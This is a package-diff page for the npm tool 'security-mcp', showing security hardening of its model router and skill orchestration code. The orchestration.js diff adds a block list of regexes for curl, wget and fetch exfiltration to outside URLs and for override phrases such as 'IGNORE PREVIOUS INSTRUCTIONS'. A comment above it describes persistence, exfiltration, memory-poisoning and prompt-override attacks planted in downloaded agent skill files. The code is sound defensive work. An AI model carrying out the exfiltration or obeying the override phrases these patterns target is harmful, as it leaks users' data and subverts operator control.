npm - security-mcp - Versions diffs - 1.1.4 → 1.3.1 - Mend

security-mcp 1.1.4 → 1.3.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (129) hide show

package/README.md +116 -264
package/defaults/checklists/ai.json +20 -1
package/defaults/checklists/api.json +35 -1
package/defaults/checklists/infra.json +34 -1
package/defaults/checklists/mobile.json +23 -1
package/defaults/checklists/payments.json +15 -1
package/defaults/checklists/web.json +11 -1
package/defaults/security-policy.json +2 -2
package/dist/cli/index.js +0 -0
package/dist/gate/baseline.js +82 -7
package/dist/gate/catalog.js +10 -2
package/dist/gate/checks/ai.js +757 -39
package/dist/gate/checks/auth-deep.js +920 -216
package/dist/gate/checks/business-logic.js +751 -0
package/dist/gate/checks/ci-pipeline.js +399 -4
package/dist/gate/checks/crypto.js +423 -2
package/dist/gate/checks/dependencies.js +571 -15
package/dist/gate/checks/graphql.js +201 -19
package/dist/gate/checks/infra.js +246 -1
package/dist/gate/checks/injection-deep.js +827 -184
package/dist/gate/checks/k8s.js +114 -1
package/dist/gate/checks/mobile-android.js +917 -3
package/dist/gate/checks/mobile-ios.js +797 -5
package/dist/gate/checks/required-artifacts.js +194 -0
package/dist/gate/checks/runtime.js +178 -0
package/dist/gate/checks/secrets.js +244 -13
package/dist/gate/checks/supply-chain-deep.js +787 -0
package/dist/gate/checks/web-nextjs.js +572 -48
package/dist/gate/diff.js +17 -5
package/dist/gate/evidence.js +8 -1
package/dist/gate/exceptions.js +131 -9
package/dist/gate/policy.js +280 -131
package/dist/mcp/audit-chain.js +122 -28
package/dist/mcp/auth.js +169 -0
package/dist/mcp/learning.js +129 -4
package/dist/mcp/model-router.js +158 -21
package/dist/mcp/orchestration.js +186 -51
package/dist/mcp/server.js +337 -53
package/dist/repo/fs.js +24 -1
package/dist/repo/search.js +31 -6
package/dist/review/store.js +52 -1
package/package.json +7 -7
package/skills/_TEMPLATE/SKILL.md +99 -0
package/skills/advanced-dos-tester/SKILL.md +109 -0
package/skills/agentic-loop-exploiter/SKILL.md +368 -0
package/skills/ai-llm-redteam/SKILL.md +104 -0
package/skills/ai-model-supply-chain-agent/SKILL.md +103 -0
package/skills/algorithm-implementation-reviewer/SKILL.md +98 -0
package/skills/android-penetration-tester/SKILL.md +455 -46
package/skills/anti-replay-tester/SKILL.md +106 -0
package/skills/appsec-code-auditor/SKILL.md +85 -0
package/skills/artifact-integrity-analyst/SKILL.md +441 -0
package/skills/attack-navigator/SKILL.md +467 -8
package/skills/auth-session-hacker/SKILL.md +102 -0
package/skills/aws-penetration-tester/SKILL.md +456 -0
package/skills/azure-penetration-tester/SKILL.md +490 -3
package/skills/binary-auth-validator/SKILL.md +111 -0
package/skills/bot-detection-specialist/SKILL.md +109 -0
package/skills/business-logic-attacker/SKILL.md +231 -0
package/skills/capec-code-mapper/SKILL.md +84 -0
package/skills/cert-pin-rotation-specialist/SKILL.md +112 -0
package/skills/cicd-pipeline-hijacker/SKILL.md +405 -0
package/skills/ciso-orchestrator/SKILL.md +454 -43
package/skills/cloud-infra-specialist/SKILL.md +118 -0
package/skills/compliance-gap-analyst/SKILL.md +422 -0
package/skills/compliance-grc/SKILL.md +85 -0
package/skills/compliance-lifecycle-tracker/SKILL.md +84 -0
package/skills/credential-stuffing-specialist/SKILL.md +102 -0
package/skills/crypto-pki-specialist/SKILL.md +87 -0
package/skills/csa-ccm-mapper/SKILL.md +84 -0
package/skills/csf2-governance-mapper/SKILL.md +84 -0
package/skills/deep-link-fuzzer/SKILL.md +109 -0
package/skills/dependency-confusion-attacker/SKILL.md +415 -0
package/skills/device-integrity-aggregator/SKILL.md +108 -0
package/skills/dos-resilience-tester/SKILL.md +97 -0
package/skills/dread-scorer/SKILL.md +84 -0
package/skills/egress-policy-enforcer/SKILL.md +99 -0
package/skills/evidence-collector/SKILL.md +98 -0
package/skills/file-upload-attacker/SKILL.md +109 -0
package/skills/gcp-penetration-tester/SKILL.md +459 -2
package/skills/git-history-secret-scanner/SKILL.md +106 -0
package/skills/iam-privesc-graph-builder/SKILL.md +152 -0
package/skills/incident-responder/SKILL.md +111 -0
package/skills/injection-specialist/SKILL.md +102 -0
package/skills/ios-security-auditor/SKILL.md +282 -0
package/skills/json-ambiguity-tester/SKILL.md +0 -0
package/skills/k8s-container-escaper/SKILL.md +384 -0
package/skills/key-management-lifecycle-analyst/SKILL.md +98 -0
package/skills/kill-switch-engineer/SKILL.md +102 -0
package/skills/linddun-privacy-analyst/SKILL.md +102 -0
package/skills/logic-race-fuzzer/SKILL.md +443 -0
package/skills/mobile-api-network-attacker/SKILL.md +421 -0
package/skills/mobile-binary-hardener/SKILL.md +102 -0
package/skills/mobile-security-specialist/SKILL.md +85 -0
package/skills/mobile-webview-auditor/SKILL.md +96 -0
package/skills/model-extraction-attacker/SKILL.md +219 -0
package/skills/multipart-abuse-tester/SKILL.md +84 -0
package/skills/oauth-pkce-specialist/SKILL.md +104 -0
package/skills/parser-exhaustion-tester/SKILL.md +142 -0
package/skills/pentest-infra/SKILL.md +98 -0
package/skills/pentest-social/SKILL.md +201 -0
package/skills/pentest-team/SKILL.md +87 -0
package/skills/pentest-web-api/SKILL.md +98 -0
package/skills/privacy-flow-analyst/SKILL.md +234 -0
package/skills/prompt-injection-specialist/SKILL.md +394 -0
package/skills/quantum-migration-planner/SKILL.md +96 -0
package/skills/rag-poisoning-specialist/SKILL.md +358 -0
package/skills/registry-mirror-enforcer/SKILL.md +84 -0
package/skills/rotation-validation-agent/SKILL.md +112 -0
package/skills/samm-assessor/SKILL.md +85 -0
package/skills/secrets-mask-bypass-tester/SKILL.md +100 -0
package/skills/senior-security-engineer/SKILL.md +167 -0
package/skills/serialization-memory-attacker/SKILL.md +332 -0
package/skills/session-timeout-tester/SKILL.md +161 -0
package/skills/slsa-level3-enforcer/SKILL.md +112 -0
package/skills/slsa-provenance-enforcer/SKILL.md +102 -0
package/skills/ssrf-detection-validator/SKILL.md +108 -0
package/skills/step-up-auth-enforcer/SKILL.md +84 -0
package/skills/stride-pasta-analyst/SKILL.md +420 -0
package/skills/supply-chain-devsecops/SKILL.md +98 -0
package/skills/threat-infrastructure-analyst/SKILL.md +84 -0
package/skills/threat-modeler/SKILL.md +85 -0
package/skills/tls-certificate-auditor/SKILL.md +573 -18
package/skills/token-reuse-detector/SKILL.md +95 -0
package/skills/trike-risk-modeler/SKILL.md +84 -0
package/skills/unicode-homograph-tester/SKILL.md +84 -0
package/skills/waf-rule-lifecycle-agent/SKILL.md +97 -0
package/skills/webhook-security-tester/SKILL.md +102 -0
package/skills/zero-trust-architect/SKILL.md +109 -0

package/dist/mcp/model-router.js CHANGED Viewed

@@ -35,9 +35,28 @@ const MEMORY_DIR = join(".mcp", "memory");
 const USAGE_FILE = join(MEMORY_DIR, "model-usage.json");
 const HEALTH_FILE = join(MEMORY_DIR, "provider-health.json");
 const POLICY_FILE = join(".mcp", "policies", "security-policy.json");
-const DEFAULT_BUDGET_USD = 5.0;
+const DEFAULT_BUDGET_USD = 5;
 const CIRCUIT_BREAKER_THRESHOLD = 3; // failures before circuit opens
 const CIRCUIT_BREAKER_COOLDOWN_MS = 60_000; // 60 seconds
+// ---------------------------------------------------------------------------
+// Rate limiting — recordProviderFailure to prevent circuit-breaker manipulation
+// ---------------------------------------------------------------------------
+const _providerFailureSubmissions = new Map();
+const FAILURE_RATE_LIMIT = 5; // max 5 failure reports per provider per window
+const FAILURE_WINDOW_MS = 300_000; // 5 minute window
+export function recordProviderFailureRateLimited(providerName) {
+    const now = Date.now();
+    const entry = _providerFailureSubmissions.get(providerName);
+    if (!entry || now - entry.windowStart > FAILURE_WINDOW_MS) {
+        _providerFailureSubmissions.set(providerName, { count: 1, windowStart: now });
+        return { allowed: true };
+    }
+    if (entry.count >= FAILURE_RATE_LIMIT) {
+        return { allowed: false, reason: `Rate limit exceeded: max ${FAILURE_RATE_LIMIT} failure reports per provider per 5 minutes` };
+    }
+    entry.count++;
+    return { allowed: true };
+}
 /**
  * Full model registry across all providers.
  * Pricing sourced from public pricing pages (approximate, for routing decisions only).
@@ -57,8 +76,8 @@ export const MODEL_REGISTRY = [
         modelId: "claude-sonnet-4-6",
         provider: "anthropic",
         capabilityTier: "standard",
-        inputPer1M: 3.0,
-        outputPer1M: 15.0,
+        inputPer1M: 3,
+        outputPer1M: 15,
         label: "Claude Sonnet 4.6"
     },
     // OpenAI — GPT
@@ -67,15 +86,15 @@ export const MODEL_REGISTRY = [
         provider: "openai",
         capabilityTier: "light",
         inputPer1M: 0.15,
-        outputPer1M: 0.60,
+        outputPer1M: 0.6,
         label: "GPT-4o Mini"
     },
     {
         modelId: "gpt-4o",
         provider: "openai",
         capabilityTier: "standard",
-        inputPer1M: 2.50,
-        outputPer1M: 10.0,
+        inputPer1M: 2.5,
+        outputPer1M: 10,
         label: "GPT-4o"
     },
     // Google — Gemini
@@ -84,7 +103,7 @@ export const MODEL_REGISTRY = [
         provider: "google",
         capabilityTier: "light",
         inputPer1M: 0.075,
-        outputPer1M: 0.30,
+        outputPer1M: 0.3,
         label: "Gemini 1.5 Flash"
     },
     {
@@ -92,7 +111,7 @@ export const MODEL_REGISTRY = [
         provider: "google",
         capabilityTier: "standard",
         inputPer1M: 1.25,
-        outputPer1M: 5.0,
+        outputPer1M: 5,
         label: "Gemini 1.5 Pro"
     },
     // Cohere — Command R
@@ -101,17 +120,44 @@ export const MODEL_REGISTRY = [
         provider: "cohere",
         capabilityTier: "light",
         inputPer1M: 0.15,
-        outputPer1M: 0.60,
+        outputPer1M: 0.6,
         label: "Command R"
     },
     {
         modelId: "command-r-plus",
         provider: "cohere",
         capabilityTier: "standard",
-        inputPer1M: 2.50,
-        outputPer1M: 10.0,
+        inputPer1M: 2.5,
+        outputPer1M: 10,
         label: "Command R+"
     },
+    // Anthropic — Claude Opus (advanced tier, opt-in via advanced_task_preference in policy)
+    {
+        modelId: "claude-opus-4-8",
+        provider: "anthropic",
+        capabilityTier: "advanced",
+        inputPer1M: 15,
+        outputPer1M: 75,
+        label: "Claude Opus 4.8"
+    },
+    // OpenAI — o1 (advanced tier)
+    {
+        modelId: "o1",
+        provider: "openai",
+        capabilityTier: "advanced",
+        inputPer1M: 15,
+        outputPer1M: 60,
+        label: "OpenAI o1"
+    },
+    // Google — Gemini 2.0 Flash (advanced tier)
+    {
+        modelId: "gemini-2.0-flash-thinking-exp",
+        provider: "google",
+        capabilityTier: "advanced",
+        inputPer1M: 0,
+        outputPer1M: 0,
+        label: "Gemini 2.0 Flash Thinking (experimental)"
+    },
     // Local — Ollama (zero cost, requires Ollama at localhost:11434)
     {
         modelId: "llama3",
@@ -235,6 +281,16 @@ async function loadPreferredProviders() {
         return null;
     }
 }
+async function loadAdvancedTaskPreferences() {
+    try {
+        const raw = await readFile(POLICY_FILE, "utf-8");
+        const policy = JSON.parse(raw);
+        return policy.model_budget?.advanced_task_preference ?? [];
+    }
+    catch {
+        return [];
+    }
+}
 // ---------------------------------------------------------------------------
 // Circuit breaker helpers
 // ---------------------------------------------------------------------------
@@ -265,12 +321,31 @@ function legacyTier(capTier) {
  * Select the cheapest healthy model that meets the capability requirement for
  * the given task type. Respects preferred_providers policy and circuit breakers.
  *
- * @param requiredTier  Minimum capability tier for the task.
- * @param health        Current provider health store.
- * @param preferred     Optional ordered list of preferred providers.
- * @returns             [chosen model, failoverUsed]
+ * @param requiredTier    Minimum capability tier for the task.
+ * @param health          Current provider health store.
+ * @param preferred       Optional ordered list of preferred providers.
+ * @param preferAdvanced  If true, try advanced-tier models first, fall back to standard.
+ * @returns               [chosen model, failoverUsed]
  */
-function selectModel(requiredTier, health, preferred) {
+function selectModel(requiredTier, health, preferred, preferAdvanced = false) {
+    // If advanced is preferred, try advanced-tier models first. Fall back gracefully to
+    // standard if none are healthy or registered — zero impact for users without Opus/o1.
+    if (preferAdvanced) {
+        const advancedCandidates = MODEL_REGISTRY.filter((m) => m.capabilityTier === "advanced");
+        const healthyAdvanced = advancedCandidates.filter((m) => !isCircuitOpen(health.providers[m.provider]));
+        if (healthyAdvanced.length > 0) {
+            const pool = preferred
+                ? [
+                    ...healthyAdvanced.filter((m) => preferred.includes(m.provider)),
+                    ...healthyAdvanced.filter((m) => !preferred.includes(m.provider))
+                ]
+                : healthyAdvanced;
+            pool.sort((a, b) => combinedCost(a) - combinedCost(b));
+            if (pool.length > 0)
+                return [pool[0], false];
+        }
+        // No advanced model available — fall through to standard selection silently.
+    }
     // Candidates: all models meeting the capability floor.
     const candidates = MODEL_REGISTRY.filter((m) => meetsCapabilityFloor(m, requiredTier));
     // Separate healthy vs. circuit-open providers.
@@ -304,14 +379,16 @@ function selectModel(requiredTier, health, preferred) {
  * Falls back to next-cheapest provider on circuit breaker open.
  */
 export async function getModelForTask(taskType, _opts) {
-    const [store, health, maxBudget, preferred] = await Promise.all([
+    const [store, health, maxBudget, preferred, advancedPrefs] = await Promise.all([
         loadUsageStore(),
         loadHealthStore(),
         loadMaxBudget(),
-        loadPreferredProviders()
+        loadPreferredProviders(),
+        loadAdvancedTaskPreferences()
     ]);
     const requiredTier = TASK_CAPABILITY_MAP[taskType];
-    const [chosen, failoverUsed] = selectModel(requiredTier, health, preferred);
+    const preferAdvanced = advancedPrefs.includes(taskType);
+    const [chosen, failoverUsed] = selectModel(requiredTier, health, preferred, preferAdvanced);
     const spent = store.totalSpentUsd;
     const remaining = maxBudget - spent;
     const utilizationPct = maxBudget > 0 ? (spent / maxBudget) * 100 : 0;
@@ -326,6 +403,39 @@ export async function getModelForTask(taskType, _opts) {
         budgetStatus = "ok";
     }
     const rationale = buildRationale(taskType, requiredTier, chosen, failoverUsed, preferred);
+    // Determine whether all providers were circuit-open (best-effort fallback path).
+    const allProviders = ["anthropic", "openai", "google", "cohere", "local"];
+    const allCircuitsOpen = allProviders.every((p) => isCircuitOpen(health.providers[p]));
+    // ISO 42001 §9.1 — emit structured audit log for every routing decision.
+    let routingReason;
+    if (allCircuitsOpen) {
+        routingReason = "circuit_open_fallback";
+    }
+    else if (failoverUsed) {
+        routingReason = "capability_match";
+    }
+    else {
+        routingReason = "cost_optimized";
+    }
+    console.log(JSON.stringify({
+        event: "MODEL_ROUTING_DECISION",
+        timestamp: new Date().toISOString(),
+        taskType,
+        selectedModel: chosen.modelId,
+        selectedProvider: chosen.provider,
+        reason: routingReason,
+        circuitState: allCircuitsOpen ? "FALLBACK" : "NORMAL",
+    }));
+    // Additional high-severity audit entry for the circuit-breaker fallback path.
+    if (allCircuitsOpen) {
+        console.warn(JSON.stringify({
+            event: "MODEL_ROUTING_CIRCUIT_FALLBACK",
+            timestamp: new Date().toISOString(),
+            reason: "ALL_PROVIDERS_CIRCUIT_OPEN",
+            fallbackModel: chosen.modelId,
+            severity: "HIGH",
+        }));
+    }
     return {
         model: chosen.modelId,
         provider: chosen.provider,
@@ -358,8 +468,8 @@ function buildRationale(taskType, required, chosen, failoverUsed, preferred) {
 export async function trackUsage(usage) {
     const [store, health] = await Promise.all([loadUsageStore(), loadHealthStore()]);
     const model = MODEL_REGISTRY.find((m) => m.modelId === usage.model);
-    const inputRate = model?.inputPer1M ?? (usage.tier === "haiku" ? 0.25 : 3.0);
-    const outputRate = model?.outputPer1M ?? (usage.tier === "haiku" ? 1.25 : 15.0);
+    const inputRate = model?.inputPer1M ?? (usage.tier === "haiku" ? 0.25 : 3);
+    const outputRate = model?.outputPer1M ?? (usage.tier === "haiku" ? 1.25 : 15);
     const estimatedCost = (usage.inputTokens / 1_000_000) * inputRate +
         (usage.outputTokens / 1_000_000) * outputRate;
     const record = {
@@ -389,8 +499,13 @@ export async function trackUsage(usage) {
 /**
  * Record a provider failure (connection error, rate limit, auth failure).
  * Opens circuit breaker after CIRCUIT_BREAKER_THRESHOLD consecutive failures.
+ * Rate-limited to prevent deliberate circuit-breaker manipulation (max 5 per provider per 5 min).
  */
 export async function recordProviderFailure(provider) {
+    const rateCheck = recordProviderFailureRateLimited(provider);
+    if (!rateCheck.allowed) {
+        return { recorded: false, reason: rateCheck.reason };
+    }
     const health = await loadHealthStore();
     const now = new Date();
     const state = health.providers[provider] ?? {
@@ -407,6 +522,28 @@ export async function recordProviderFailure(provider) {
     }
     health.providers[provider] = state;
     await saveHealthStore(health);
+    // Circuit-state audit: warn and emit structured audit record if all known providers are circuit-open.
+    // Deliberate manipulation requires only CIRCUIT_BREAKER_THRESHOLD (3) failures per provider × 5 providers
+    // = 15 calls, constrained to max 5 per provider per 5-min window. Log at ERROR level so SIEM picks this up.
+    // MITRE ATLAS AML.T0040 (ML Model Inference API) — circuit-breaker exhaustion attack.
+    const allProviders = ["anthropic", "openai", "google", "cohere", "local"];
+    const allProvidersDown = allProviders.every((p) => isCircuitOpen(health.providers[p]));
+    if (allProvidersDown) {
+        // Determine which fallback model will be used (cheapest in registry, circuit ignored).
+        const fallbackCandidates = MODEL_REGISTRY.filter((m) => m.provider === "anthropic" && m.capabilityTier === "standard");
+        const fallbackModel = fallbackCandidates[0]?.modelId ?? "unknown";
+        console.error(JSON.stringify({
+            severity: "CRITICAL",
+            event: "ALL_PROVIDERS_CIRCUIT_OPEN",
+            message: "All AI providers are circuit-open. Routing to fallback model. This may indicate deliberate circuit-breaker manipulation.",
+            fallbackModel,
+            timestamp: new Date().toISOString(),
+            failingProvider: provider,
+            mitre: "AML.T0040",
+            action: "Manual investigation required. Call security.reset_provider_circuit after confirming provider health."
+        }));
+    }
+    return { recorded: true };
 }
 /**
  * Return health status for all providers — circuit breaker state and call counts.

package/dist/mcp/orchestration.js CHANGED Viewed

@@ -12,7 +12,7 @@
  *   8. orchestration.apply_updates        — run auto-update (auto | manual)
  *   9. orchestration.verify_skill_coverage — report uncovered SKILL.md sections
  */
-import { createHash } from "node:crypto";
+import { createHash, randomBytes } from "node:crypto";
 import * as https from "node:https";
 import { mkdir, readFile, writeFile, readdir } from "node:fs/promises";
 import { existsSync, readFileSync, writeFileSync, renameSync, mkdirSync } from "node:fs";
@@ -28,7 +28,12 @@ const MEMORY_DIR = join(homedir(), ".security-mcp", "agent-memory");
 const SKILL_VERSIONS_PATH = join(homedir(), ".security-mcp", "skill-versions.json");
 const SKILLS_MANIFEST_URL = "https://raw.githubusercontent.com/AbrahamOO/security-mcp/main/skills-manifest.json";
 const CLAUDE_SKILLS_DIR = join(homedir(), ".claude", "skills");
+// CWE-494: Pin the registry URL to the canonical npm registry. Never allow
+// this to be overridden by env vars — a compromised env could redirect to a
+// malicious registry.
 const NPM_REGISTRY_URL = "https://registry.npmjs.org/security-mcp/latest";
+// Strict SemVer pattern — rejects any version string that doesn't conform.
+const SEMVER_RE = /^\d{1,5}\.\d{1,5}\.\d{1,5}(?:-[\w.+]+)?$/;
 // CWE-22: input validation patterns for path components
 const SAFE_SKILL_NAME_RE = /^[a-zA-Z0-9][a-zA-Z0-9._-]{0,127}$/;
 const SAFE_AGENT_NAME_RE = /^[a-zA-Z0-9][a-zA-Z0-9._-]{0,127}$/;
@@ -39,12 +44,18 @@ const ALLOWED_SKILL_URL_PREFIX = "https://raw.githubusercontent.com/";
 const MAX_MANIFEST_BYTES = 256 * 1024; // 256 KB
 const MAX_SKILL_BYTES = 512 * 1024; // 512 KB
 const MAX_NPM_BYTES = 64 * 1024; // 64 KB
-// All SKILL.md sections that must be covered per run
+// All SKILL.md sections that must be covered per run.
+// §EDGE-CASE-MATRIX, §TEMPORAL-THREATS, §DETECTION-GAP, §ZERO-MISS-MANDATE are the
+// four universal sections added to every skill; coverage verification tracks them too.
 const SKILL_MD_SECTIONS = [
     "§1", "§2", "§3", "§4", "§5", "§6", "§7", "§8",
     "§9", "§10", "§11", "§12", "§13", "§14", "§15",
     "§16", "§17", "§18", "§19", "§20", "§21", "§22",
-    "§23", "§24"
+    "§23", "§24",
+    "§EDGE-CASE-MATRIX",
+    "§TEMPORAL-THREATS",
+    "§DETECTION-GAP",
+    "§ZERO-MISS-MANDATE"
 ];
 // ---------------------------------------------------------------------------
 // Internal helpers
@@ -198,8 +209,11 @@ export const CreateAgentRunSchema = z.object({
 });
 export async function createAgentRun(args) {
     const { runId, scope, internetPermitted, stackContext } = args;
+    // Use 16 bytes of CSPRNG entropy (not Date.now()) so the ID cannot be
+    // predicted or brute-forced even when runId is known.
     const agentRunId = createHash("sha256")
-        .update(`${runId}:${Date.now()}`)
+        .update(`${runId}:`)
+        .update(randomBytes(16))
         .digest("hex")
         .slice(0, 32);
     await ensureDir(agentRunDir(agentRunId));
@@ -221,10 +235,12 @@ export async function createAgentRun(args) {
 // ---------------------------------------------------------------------------
 export const UpdateAgentStatusSchema = z.object({
     agentRunId: z.string().describe("Agent run ID from orchestration.create_agent_run."),
-    agentName: z.string().describe("Name of the agent updating its status."),
+    // CWE-22: constrain agentName to the same safe-name pattern used in path operations
+    agentName: z.string().regex(SAFE_AGENT_NAME_RE, "agentName must be alphanumeric with ._- separators").describe("Name of the agent updating its status."),
     status: z.enum(["running", "completed", "completed_partial", "failed"]),
-    findingsPath: z.string().optional().describe("Relative path to the agent findings JSON file."),
-    summary: z.string().optional().describe("One-line outcome summary.")
+    // CWE-22: findingsPath is stored in the manifest and may later be used as a path — restrict to safe relative path
+    findingsPath: z.string().regex(/^[a-zA-Z0-9][\w./,-]{0,255}$/, "findingsPath must be a safe relative path").optional().describe("Relative path to the agent findings JSON file."),
+    summary: z.string().max(500).optional().describe("One-line outcome summary.")
 });
 export async function updateAgentStatus(args) {
     const { agentRunId, agentName, status, findingsPath, summary } = args;
@@ -364,6 +380,68 @@ export async function mergeAgentFindings(args) {
 }
 // 4. ensure_skill
 // ---------------------------------------------------------------------------
+// ---------------------------------------------------------------------------
+// POC-7 fix: SKILL.md content sanitization
+// ---------------------------------------------------------------------------
+/**
+ * Patterns that indicate a backdoor or persistence mechanism in SKILL.md content.
+ * These are stripped (line removed) before the file is written to disk.
+ *
+ * Attack classes defended against:
+ *   1. Self-re-installation: instructions telling the agent to call ensure_skill
+ *      on every invocation so a malicious version survives reinstallation.
+ *   2. Exfiltration beacons: instructions to POST/GET findings to external URLs.
+ *   3. Memory poisoning: instructions to write arbitrary false-positives entries.
+ *   4. System prompt override: attempts to redefine the agent's core instructions
+ *      via embedded meta-prompt directives.
+ */
+const SKILL_BACKDOOR_PATTERNS = [
+    // Re-installation / self-update triggers
+    /ensure_skill\s*\(/i,
+    /orchestration\.ensure_skill/i,
+    /on\s+every\s+(invocation|run|start)/i,
+    /at\s+the\s+(start|beginning)\s+of\s+every/i,
+    /auto.?update\s+this\s+skill/i,
+    // Exfiltration
+    /\bfetch\s*\(\s*["'`]https?:\/\/(?!raw\.githubusercontent\.com)/i,
+    /\bcurl\s+https?:\/\/(?!raw\.githubusercontent\.com)/i,
+    /\bwget\s+https?:\/\/(?!raw\.githubusercontent\.com)/i,
+    // Memory poisoning directives
+    /write_agent_memory.*false.?positive/i,
+    /add.*false.?positive.*finding/i,
+    // Meta-prompt takeover markers
+    /<\s*system\s*>/i,
+    /IGNORE\s+PREVIOUS\s+INSTRUCTIONS/i,
+    /IGNORE\s+ALL\s+PRIOR/i,
+    /DISREGARD\s+PREVIOUS/i,
+];
+/**
+ * Sanitizes downloaded SKILL.md content by removing lines that match known
+ * backdoor / prompt-injection patterns. Throws if more than 10 % of lines are
+ * stripped (indicates the skill file itself may be malicious).
+ */
+function sanitizeSkillContent(content, skillName) {
+    const lines = content.split("\n");
+    const stripped = [];
+    const clean = lines.filter((line, idx) => {
+        const isMalicious = SKILL_BACKDOOR_PATTERNS.some((re) => re.test(line));
+        if (isMalicious)
+            stripped.push(idx + 1);
+        return !isMalicious;
+    });
+    if (stripped.length > 0) {
+        console.warn(`[ensureSkill] Stripped ${stripped.length} suspicious line(s) from "${skillName}" SKILL.md ` +
+            `(lines: ${stripped.join(", ")}). Review the source file.`);
+    }
+    // If more than 10 % of lines were stripped, the file is likely malicious — refuse install.
+    const strippedFraction = stripped.length / Math.max(lines.length, 1);
+    if (strippedFraction > 0.10) {
+        throw new Error(`SKILL.md for "${skillName}" was rejected: ${stripped.length}/${lines.length} lines ` +
+            `matched backdoor patterns (>${Math.round(strippedFraction * 100)}% threshold). ` +
+            `Do not install this skill.`);
+    }
+    return clean.join("\n");
+}
 export const EnsureSkillSchema = z.object({
     skillName: z.string().describe("Name of the skill to ensure is installed (e.g. 'threat-modeler')."),
     version: z.string().optional().describe("Required version; re-downloads if installed version differs.")
@@ -402,21 +480,26 @@ export async function ensureSkill(args) {
     if (!content) {
         throw new Error(`Failed to download SKILL.md for "${skillName}" from ${entry.url}`);
     }
-    // CWE-494: verify SHA-256 of downloaded skill content against manifest hash
+    // CWE-494: verify SHA-256 of downloaded skill content against manifest hash.
+    // sha256 is MANDATORY — reject any manifest entry that omits it. An absent sha256
+    // field is itself an attack vector (allows content substitution without detection).
     const actualHash = createHash("sha256").update(content, "utf-8").digest("hex");
-    if (entry.sha256) {
-        const expectedHash = entry.sha256;
-        if (actualHash !== expectedHash) {
-            throw new Error(`Integrity check failed for skill "${skillName}": expected ${expectedHash}, got ${actualHash}`);
-        }
+    const expectedHash = entry.sha256;
+    if (!expectedHash) {
+        throw new Error(`Integrity check failed for skill "${skillName}": manifest entry has no sha256 field. ` +
+            `All skill entries must include a sha256 hash. Refusing to install.`);
     }
-    else {
-        console.warn(`[ensureSkill] No sha256 in manifest for "${skillName}" — skipping integrity check. Consider pinning the manifest to a commit SHA.`);
+    if (actualHash !== expectedHash) {
+        throw new Error(`Integrity check failed for skill "${skillName}": expected ${expectedHash}, got ${actualHash}`);
     }
+    // POC-7 fix: sanitize SKILL.md content before writing to disk.
+    // Strip instruction patterns that would cause the agent to re-invoke ensure_skill
+    // on every run (persistence backdoor) or exfiltrate data to external URLs.
+    const sanitized = sanitizeSkillContent(content, skillName);
     // Write skill atomically (write to temp, then rename) to prevent partial-write corruption
     mkdirSync(dirname(skillPath), { recursive: true });
     const tmpSkillPath = `${skillPath}.tmp.${process.pid}`;
-    writeFileSync(tmpSkillPath, content, "utf-8");
+    writeFileSync(tmpSkillPath, sanitized, "utf-8");
     renameSync(tmpSkillPath, skillPath);
     // Update version cache
     versions[skillName] = { version: entry.version, installedAt: new Date().toISOString(), path: skillPath };
@@ -446,14 +529,26 @@ export async function readAgentMemory(args) {
 }
 // 6. write_agent_memory
 // ---------------------------------------------------------------------------
+// CWE-20: typed schema for false-positive entries — prevents arbitrary suppression payloads
+const FalsePositiveEntrySchema = z.object({
+    findingId: z.string().min(1).max(128).regex(/^[A-Z0-9_-]+$/, "findingId must be UPPER_SNAKE_CASE"),
+    reason: z.string().min(1).max(500),
+    affectedFiles: z.array(z.string().max(256)).max(50).optional(),
+    suppressUntil: z.string().datetime().optional(),
+    addedBy: z.literal("agent").describe("Only agents may add false-positive entries; blocks attacker-injected 'addedBy' fields")
+});
+// CWE-400: cap on individual memory entries to prevent disk exhaustion
+const MAX_MEMORY_ITEMS = 500;
+const MAX_PATTERN_ITEM_LENGTH = 2048; // characters per pattern string item
+const MAX_INTEL_BYTES = 65536; // 64 KB
 export const WriteAgentMemorySchema = z.object({
     agentName: z.string().describe("Agent name whose memory to update."),
     data: z.object({
-        patterns: z.array(z.unknown()).optional(),
-        falsePositives: z.array(z.unknown()).optional(),
-        remediations: z.array(z.unknown()).optional(),
+        patterns: z.array(z.string().max(MAX_PATTERN_ITEM_LENGTH)).max(MAX_MEMORY_ITEMS).optional(),
+        falsePositives: z.array(FalsePositiveEntrySchema).max(MAX_MEMORY_ITEMS).optional(),
+        remediations: z.array(z.string().max(MAX_PATTERN_ITEM_LENGTH)).max(MAX_MEMORY_ITEMS).optional(),
         intel: z.unknown().optional(),
-        errors: z.array(z.unknown()).optional()
+        errors: z.array(z.string().max(MAX_PATTERN_ITEM_LENGTH)).max(MAX_MEMORY_ITEMS).optional()
     })
 });
 export async function writeAgentMemory(args) {
@@ -468,9 +563,14 @@ export async function writeAgentMemory(args) {
     const append = (file, newItems, existing) => {
         if (!newItems?.length)
             return;
-        const merged = [...existing, ...newItems];
+        // CWE-400: cap total entries to prevent disk exhaustion
+        const merged = [...existing, ...newItems].slice(-MAX_MEMORY_ITEMS);
+        const serialized = JSON.stringify(merged, null, 2) + "\n";
+        if (Buffer.byteLength(serialized, "utf-8") > MAX_INTEL_BYTES) {
+            throw new Error(`Memory file "${file}" would exceed 64 KB size cap after write — trim existing entries first.`);
+        }
         const p = join(dir, file);
-        writeFileSync(p, JSON.stringify(merged, null, 2) + "\n", "utf-8");
+        writeFileSync(p, serialized, "utf-8");
         written.push(p);
     };
     append("patterns.json", data.patterns, readJson(join(dir, "patterns.json"), []));
@@ -484,7 +584,12 @@ export async function writeAgentMemory(args) {
         const intelObj = (typeof data.intel === "object" && data.intel !== null)
             ? Object.fromEntries(Object.entries(data.intel).filter(([k]) => !PROTO_KEYS.has(k)))
             : {};
-        writeFileSync(p, JSON.stringify({ ...intelObj, fetchedAt: new Date().toISOString() }, null, 2) + "\n", "utf-8");
+        const intelPayload = JSON.stringify({ ...intelObj, fetchedAt: new Date().toISOString() }, null, 2) + "\n";
+        // CWE-400: reject intel blobs over 64 KB
+        if (Buffer.byteLength(intelPayload, "utf-8") > MAX_INTEL_BYTES) {
+            throw new Error(`Intel payload exceeds 64 KB size cap (${Buffer.byteLength(intelPayload, "utf-8")} bytes).`);
+        }
+        writeFileSync(p, intelPayload, "utf-8");
         written.push(p);
     }
     return { written };
@@ -494,43 +599,57 @@ export async function writeAgentMemory(args) {
 export const CheckUpdatesSchema = z.object({
     currentMcpVersion: z.string().describe("Currently installed security-mcp version (from package.json).")
 });
-export async function checkUpdates(args) {
-    const { currentMcpVersion } = args;
